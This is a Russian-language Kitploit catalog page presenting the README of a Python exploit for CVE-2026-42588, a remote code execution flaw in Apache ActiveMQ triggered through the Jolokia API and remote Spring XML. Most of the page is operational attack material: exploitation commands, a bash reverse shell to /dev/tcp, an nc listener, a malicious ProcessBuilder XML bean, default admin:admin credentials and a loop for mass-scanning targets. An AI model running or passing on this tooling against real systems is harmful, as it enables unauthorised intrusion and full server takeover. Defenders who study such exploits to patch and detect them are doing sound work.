Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-42588 — Python-эксплойт RCE для CVE-2026-42588, нацеленный на Apache ActiveMQ Jolokia. Имеет режим только проверки, генерацию вредоносного XML и поддержку обратной оболочки, OOB и проверки на основе файлов. | Kitploit
Инструменты/GitHubGitHub/hnytgl/cve-2026-42588
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubhnytgl/cve-2026-42588

CVE-2026-42588

Python-эксплойт RCE для CVE-2026-42588, нацеленный на Apache ActiveMQ Jolokia. Имеет режим только проверки, генерацию вредоносного XML и поддержку обратной оболочки, OOB и проверки на основе файлов.

Репозиторий
373 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-42588 - Удаленное выполнение кода через Jolokia в Apache ActiveMQ

Уровень серьезности: 🔴 Высокий (CVSS 4.0: 8.1)
Тип уязвимости: CWE-94 — Инъекция кода
Затронутые версии: Apache ActiveMQ < 5.19.7 / 6.0.0 ≤ version < 6.2.6
Необходимые условия: Требуются учетные данные Web Console (по умолчанию admin:admin)


📋 Содержание

  • Обзор уязвимости
  • Принцип работы уязвимости
  • Затронутые версии
  • Необходимые условия для эксплуатации
  • Описание файлов
  • Быстрый старт
  • Подробное описание использования
  • Полная схема цепочки эксплуатации
  • Проверка успешности эксплуатации
  • Способы устранения
  • Временные меры смягчения
  • Часто задаваемые вопросы (FAQ)
  • Отказ от ответственности
  • Ссылки

Обзор уязвимости

CVE-2026-42588 — это уязвимость удаленного выполнения кода (RCE) после аутентификации в Apache ActiveMQ.

При наличии учетных данных Web Console атакующий может через Jolokia JMX-HTTP интерфейс (/api/jolokia/) вызвать метод BrokerService.addNetworkConnector(String), передав специально сконструированный masterslave:// discovery URI. Используя протокол xbean:, он загружает удаленный Spring XML конфигурационный файл, что в конечном итоге приводит к выполнению произвольных системных команд в JVM ActiveMQ Broker.


Принцип работы уязвимости

Цепочка эксплуатации

/api/jolokia/ (Jolokia JMX-HTTP Bridge)
       │
       ▼
BrokerService.addNetworkConnector(String)
       │
       ▼
masterslave://?brokerConfig=xbean:http://attacker/malicious.xml
       │
       ▼
XBeanBrokerFactory → ResourceXmlApplicationContext
       │
       ▼
Spring предварительно создает все синглтон-бины → Вызов Runtime.exec() / ProcessBuilder
       │
       ▼
🚨 Удаленное выполнение кода (RCE)

Ключевые технические моменты

ЭтапОписание
Поверхность JolokiaWeb Console ActiveMQ по умолчанию открывает /api/jolokia/, что позволяет выполнять операцию exec над MBean org.apache.activemq:*
Опасный методBrokerService.addNetworkConnector(String) принимает discovery URI и обрабатывает его
Цепочка срабатывания URIПараметр brokerConfig протокола masterslave:// контролируем, что в сочетании со схемой xbean: вызывает загрузку Spring контекста
Точка срабатывания RCEXBeanBrokerFactory использует ResourceXmlApplicationContext для загрузки удаленного XML; Spring создает все синглтон-бины до проверки конфигурации

Затронутые версии

ВерсияСтатус
Apache ActiveMQ < 5.19.7❌ Уязвима
6.0.0 ≤ Apache ActiveMQ < 6.2.6❌ Уязвима
Apache ActiveMQ ≥ 5.19.7✅ Исправлена
Apache ActiveMQ ≥ 6.2.6✅ Исправлена

Необходимые условия для эксплуатации

  1. ✅ Сетевая доступность — интерфейс /api/jolokia/ должен быть доступен атакующему (порт по умолчанию 8161)
  2. ✅ Действительные учетные данные — наличие учетных данных Web Console ActiveMQ (по умолчанию admin:admin)
  3. ✅ HTTP-сервер атакующего — требуется HTTP-сервер, доступный цели, для размещения вредоносного XML-файла

Описание файлов

.
├── CVE-2026-42588_EXP.py   # Скрипт эксплуатации уязвимости (основной)
├── malicious.xml            # Шаблон вредоносного Spring XML
├── requirements.txt         # Зависимости Python
└── README.md                # Этот файл
ФайлНазначение
CVE-2026-42588_EXP.pyСкрипт эксплуатации на Python с поддержкой режима проверки (--check-only) и генерации XML (--gen-xml)
malicious.xmlШаблон вредоносной Spring XML-конфигурации, содержащий два способа эксплуатации: Runtime.exec() и ProcessBuilder

Быстрый старт

1. Установка зависимостей

pip install -r requirements.txt

2. Генерация вредоносного XML-файла

python CVE-2026-42588_EXP.py --gen-xml -c "touch /tmp/activemq_pwned" > malicious.xml

3. Размещение вредоносного XML-файла

Запустите HTTP-сервер на машине атакующего:

python3 -m http.server 8080

4. Выполнение эксплуатации

# Использование учетных данных по умолчанию admin/admin
python CVE-2026-42588_EXP.py \
    -u http://192.168.1.100:8161 \
    -x http://your-attacker-ip:8080/malicious.xml

# Использование пользовательских учетных данных
python CVE-2026-42588_EXP.py \
    -u http://target:8161 \
    -U myuser \
    -P mypass \
    -x http://your-attacker-ip:8080/malicious.xml

5. (Опционально) Только проверка уязвимости

python CVE-2026-42588_EXP.py -u http://192.168.1.100:8161 --check-only

Подробное описание использования

Параметры командной строки

usage: CVE-2026-42588_EXP.py [-h] [-u URL] [-U USERNAME] [-P PASSWORD]
                             [-x XML_URL] [--check-only] [--gen-xml]
                             [-c COMMAND] [--timeout TIMEOUT] [--no-verify]

Опции:
  -u, --url         URL целевого ActiveMQ (например, http://192.168.1.100:8161)
  -U, --username    Имя пользователя Web Console (по умолчанию: admin)
  -P, --password    Пароль Web Console (по умолчанию: admin)
  -x, --xml-url     Удаленный URL вредоносного Spring XML-файла
  --check-only      Только проверить доступность интерфейса Jolokia
  --gen-xml         Сгенерировать вредоносный XML-файл и вывести в stdout
  -c, --command     Команда для выполнения на целевой системе (по умолчанию: touch /tmp/activemq_pwned)
  --timeout         Тайм-аут HTTP-запроса в секундах (по умолчанию: 30)
  --no-verify       Отключить проверку SSL-сертификата

Сценарий 1: Обратный Shell

1. Генерация вредоносного XML на машине атакующего:

python CVE-2026-42588_EXP.py --gen-xml \
    -c "/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'" \
    > reverse_shell.xml

2. Размещение XML и запуск прослушивания:

# Терминал 1: HTTP-сервер
python3 -m http.server 8080

# Терминал 2: nc для прослушивания
nc -lvnp 4444

3. Запуск эксплуатации:

python CVE-2026-42588_EXP.py \
    -u http://target:8161 \
    -x http://10.0.0.1:8080/reverse_shell.xml

Сценарий 2: Выполнение CMD-команд (цель Windows)

1. Генерация вредоносного XML для Windows:

Измените команду ProcessBuilder в malicious.xml на:

<bean class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
        <list>
            <value>cmd.exe</value>
            <value>/c</value>
            <value>whoami &gt; C:\windows\temp\pwned.txt</value>
        </list>
    </constructor-arg>
</bean>

2. Размещение и выполнение:

python CVE-2026-42588_EXP.py \
    -u http://windows-target:8161 \
    -x http://attacker:8080/malicious_win.xml

Сценарий 3: Только проверка уязвимости

# Пакетная проверка
for ip in $(cat targets.txt); do
    echo "=== Testing $ip ==="
    python CVE-2026-42588_EXP.py -u "http://$ip:8161" --check-only --timeout 5
done

Полная схема цепочки эксплуатации

Скачать инструмент